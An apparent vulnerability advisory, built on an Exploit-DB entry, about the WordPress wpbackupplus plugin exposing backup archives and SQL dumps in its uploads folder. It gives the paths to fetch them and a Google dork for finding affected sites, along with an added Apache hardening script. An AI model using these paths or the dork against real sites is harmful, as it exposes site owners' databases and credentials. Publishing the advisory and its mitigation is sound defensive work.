Vendor: Wordpress wpbackupplus
By: pSyCh0_3D (Arfaoui Moslem)
CVSS: 7.5 (HIGH)
CWE: 284 (Unauthorized Access)
Product Name: Wordpress wpbackupplus
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: win7 32 Bit & Linux Kali
Date: 2014

WordPress wpbackupplus Database and files Backup download (0-day)

wpbackupplus writes its backup .zip files into a web-accessible directory and does not protect them. To download all of the website's files, an attacker can request http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/. To download the database backup, an attacker can request http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp. The proof of concept is http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/[DATABASE_NAME]_[DATE].sql.

Mitigation:

Ensure that the backup files are stored in a secure location and are not accessible to unauthorized users.
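The following script is an added example of applying that mitigation on an Apache-hosted WordPress site; it is not part of the advisory or of the plugin. It drops a deny-all .htaccess and an empty index.php into the two directories named above (the plugin's upload directory and its temp subdirectory), so that neither the archives nor a directory listing are served to anonymous visitors. The WordPress root path is a parameter; the /var/www/html in the usage line is only a placeholder.

```shell
#!/bin/sh
# Added example (not part of the advisory): deny HTTP access to the directory
# wpbackupplus writes its backup archives to. Assumes Apache with AllowOverride
# enabled for the uploads tree; the WordPress root is passed as an argument.

set -eu

# Write a .htaccess that denies every request into the given directory.
# Covers both the Apache 2.2 (Order/Deny) and 2.4 (Require) syntaxes.
write_deny_htaccess() {
    dir="$1"
    mkdir -p "$dir"
    cat > "$dir/.htaccess" <<'EOF'
# Deny all direct HTTP access to backup archives (added by hardening script)
Options -Indexes
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>
EOF
    # An empty index.php stops directory listings even where the .htaccess
    # is ignored (for example when AllowOverride is off).
    [ -e "$dir/index.php" ] || printf '<?php // Silence is golden.\n' > "$dir/index.php"
    chmod 0640 "$dir/.htaccess" "$dir/index.php"
}

# Protect both directories the advisory names: the archive directory and
# the temp directory holding the [DATABASE_NAME]_[DATE].sql dumps.
harden_wpbackupplus() {
    wp_root="$1"
    base="$wp_root/wp-content/uploads/wp-backup-plus"
    write_deny_htaccess "$base"
    write_deny_htaccess "$base/temp"
}

# Return 0 when both guards (deny rule and index.php) are present in a directory.
is_protected() {
    dir="$1"
    [ -f "$dir/.htaccess" ] && grep -q 'Require all denied' "$dir/.htaccess" \
        && [ -f "$dir/index.php" ]
}

# Usage: sh harden_wpbackupplus.sh /var/www/html   (path is a placeholder)
if [ "${1:-}" != "" ]; then
    harden_wpbackupplus "$1"
    is_protected "$1/wp-content/uploads/wp-backup-plus/temp" && echo "protected"
fi
```

Two caveats apply. The `Options -Indexes` line needs `AllowOverride Options` (or `All`) in the server configuration; if the directive is not permitted, Apache answers with a 500 error instead of a listing, which is still safe but worth knowing when debugging. nginx ignores .htaccess entirely, so the equivalent there is a `location` block returning 403 for the same path. In either case the stronger fix is to have the plugin write backups outside the document root, so that no web server configuration stands between the archives and the public.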

Exploit-DB raw data:

# Exploit Title: Wordpress wpbackupplus Database and files Backup download (0-day)
# Google Dork: Index of:"/wp-backup-plus"
# Date: 19/07/2014
# Exploit Author: pSyCh0_3D (Arfaoui Moslem) https://www.facebook.com/lulz.sec
# Vendor Homepage: http://wpbackupplus.com/
# Version:
# Tested on: win7 32 Bit & Linux Kali

[+] Description

wpbackupplus make the backup .zip files and not protected

[+] Exploit:

For download all the website files

http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/

For download the Database backup

http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp

[+] POC :

http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/